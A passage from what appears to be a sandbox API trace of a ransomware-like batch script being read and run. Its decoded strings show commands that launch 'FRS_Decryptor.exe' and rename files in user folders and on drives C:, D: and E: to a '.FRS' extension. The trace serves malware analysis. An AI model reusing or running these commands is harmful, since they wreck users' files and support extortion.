lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0073.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] GetFileType (hFile=0x254) returned 0x1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0073.202] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0073.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] GetFileType (hFile=0x254) returned 0x1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0073.202] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] GetFileType (hFile=0x254) returned 0x1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.202] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0073.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0073.203] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.203] GetFileType (hFile=0x254) returned 0x1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0073.203] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0073.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0073.203] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.203] GetFileType (hFile=0x254) returned 0x1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0073.203] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0073.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0073.203] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.203] GetFileType (hFile=0x254) returned 0x1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0073.203] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0073.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0073.203] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.203] GetFileType (hFile=0x254) returned 0x1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0073.203] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0073.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\ng") returned 73 [0073.203] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0073.203] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.203] GetFileType (hFile=0x254) returned 0x1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0073.204] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0073.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0073.204] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.204] GetFileType (hFile=0x254) returned 0x1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0073.204] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0073.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0073.204] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.204] GetFileType (hFile=0x254) returned 0x1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0073.204] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0073.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0073.204] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.204] GetFileType (hFile=0x254) returned 0x1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0073.204] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0073.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0073.204] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.204] GetFileType (hFile=0x254) returned 0x1 [0073.204] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0073.204] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0073.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0073.205] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.205] GetFileType (hFile=0x254) returned 0x1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0073.205] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0073.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0073.205] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.205] GetFileType (hFile=0x254) returned 0x1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0073.205] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0073.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0073.205] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.205] GetFileType (hFile=0x254) returned 0x1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0073.205] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0073.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0073.205] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.205] GetFileType (hFile=0x254) returned 0x1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0073.205] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.205] SetFilePointer (in: hFile=0x254, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0073.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0073.206] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.206] GetFileType (hFile=0x254) returned 0x1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0073.206] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0073.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0073.206] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.206] GetFileType (hFile=0x254) returned 0x1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0073.206] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0073.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0073.206] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.206] GetFileType (hFile=0x254) returned 0x1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0073.206] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0073.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0073.206] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.206] GetFileType (hFile=0x254) returned 0x1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0073.206] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.206] SetFilePointer (in: hFile=0x254, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0073.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0073.207] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.207] GetFileType (hFile=0x254) returned 0x1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0073.207] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0073.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0073.207] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.207] GetFileType (hFile=0x254) returned 0x1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0073.207] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0073.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0073.207] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.207] GetFileType (hFile=0x254) returned 0x1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0073.207] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0073.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0073.207] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.207] GetFileType (hFile=0x254) returned 0x1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0073.207] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 